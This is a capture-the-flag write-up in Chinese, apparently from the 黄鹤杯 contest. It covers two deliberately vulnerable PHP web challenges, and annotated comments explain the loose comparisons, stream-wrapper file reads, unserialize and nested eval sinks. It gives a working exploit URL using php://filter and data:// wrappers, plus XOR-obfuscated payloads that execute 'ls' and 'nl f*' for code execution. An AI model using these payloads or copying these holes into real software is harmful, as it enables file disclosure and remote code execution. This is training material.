黄鹤杯

web

Code

<?php
// CTF challenge source ("Code"): reads three GET parameters and, behind a chain of
// loosely-typed checks, reaches two dangerous sinks — file_get_contents() on a
// user-supplied path, and unserialize() on user-supplied data whose result is
// then called. The point of the challenge is that every check here is weaker
// than it looks.
highlight_file(__FILE__);
include("aid.php"); // contents of aid.php are not shown on this page
if(!(isset($_GET["input1"]) && isset($_GET["input2"]) && isset($_GET["input3"])))
{
die("Insufficient Inputs!");
}

// All three values are untrusted request input; nothing beyond isset() validates them.
$input1 = $_GET["input1"];
$input2 = $_GET["input2"];
$input3 = $_GET["input3"];

// Loose comparison (==): on PHP 7.x a non-numeric string compares equal to 0, so
// `$input1==0` / `$input2==0` do not force numeric values (PHP 8 changed
// string-to-number comparison; the writeup below implies the target ran PHP 7).
// file_get_contents($input2) is itself a sink: the path is user-controlled and
// any stream wrapper is accepted.
if($input1==0&&file_get_contents($input2)=="Welcome!"&&$input2==0)
{

// Argument order is reversed: stripos("flag.php", $input1) searches for $input1
// INSIDE the literal "flag.php", so it only rejects substrings of that name.
// It is not a path allowlist and does not constrain wrapper-based paths.
if(stripos("flag.php", $input1) === false)
{
// Sink: arbitrary-path file read (plain paths and stream wrappers alike).
echo file_get_contents($input1);
// Sink: unserialize() on request data, followed by invoking the result —
// PHP object injection plus an attacker-chosen callable. Defensive fix would be
// json_decode() for data and an explicit allowlist for anything that gets called.
$variable = unserialize($input3);
$variable();
}
}

弱比较：传入字符串即可满足 ==0；file_get_contents($input2)=="Welcome!" 利用 data:// 伪协议绕过；stripos("flag.php", $input1) === false 的限制跟没有一样，直接用伪协议读取 flag.php 即可
payload:
http://103.213.97.75:52005/?input1=php://filter/read=convert.base64-encode/resource=flag.php&input2=data://text/plain,Welcome!&input3=0
解码获得flag

RCEME

 <?php
// CTF challenge source ("RCEME"): evaluates a user-supplied "calc" expression
// through two nested eval() calls after a character-allowlist check.
error_reporting(0); // suppresses warnings/parse errors that would otherwise leak detail to the caller

if(!isset($_GET["calc"]))
{
highlight_file(__FILE__);
}
else
{
// Allowlist: digits, + - * / ( ), single quote, dot, and the bitwise operators
// ~ ^ | &. Because ' and . are permitted, string literals and concatenation are
// expressible, and ^ between strings is byte-wise XOR — the filter restricts
// characters, not what the expression can evaluate to. (The /i modifier is
// inert here: the class contains no letters.)
$wl = preg_match('/^[0-9\+\-\*\/\(\)\'\.\~\^\|\&]+$/i', $_GET["calc"]);
// preg_match() returns false on a PCRE error; `=== 0` does not treat that as a
// rejection. strlen() caps the input at 70 bytes (byte length, not characters).
if($wl === 0 || strlen($_GET["calc"]) > 70) {
die("try again");
}
echo 'Result: ';
// Sink: the inner eval() returns whatever the expression evaluates to, and the
// outer eval() then interprets that RESULT as PHP code — so an expression that
// evaluates to a string becomes code execution. eval() on request data cannot be
// made safe by character filtering; a calculator needs a real expression parser.
eval("echo ".eval("return ".$_GET["calc"].";").";");
}

利用异或凑payload
('0'^'.'^'~').('^^'^'2-').('0'^'.'^'~')

ls
index.php flag.php

('0'^'.'^'~').('02~8'^'^^^^').'*'.('0'^'.'^'~')

nl f*
flag{b0c8f88ef3294ae9b605dd78f608200e}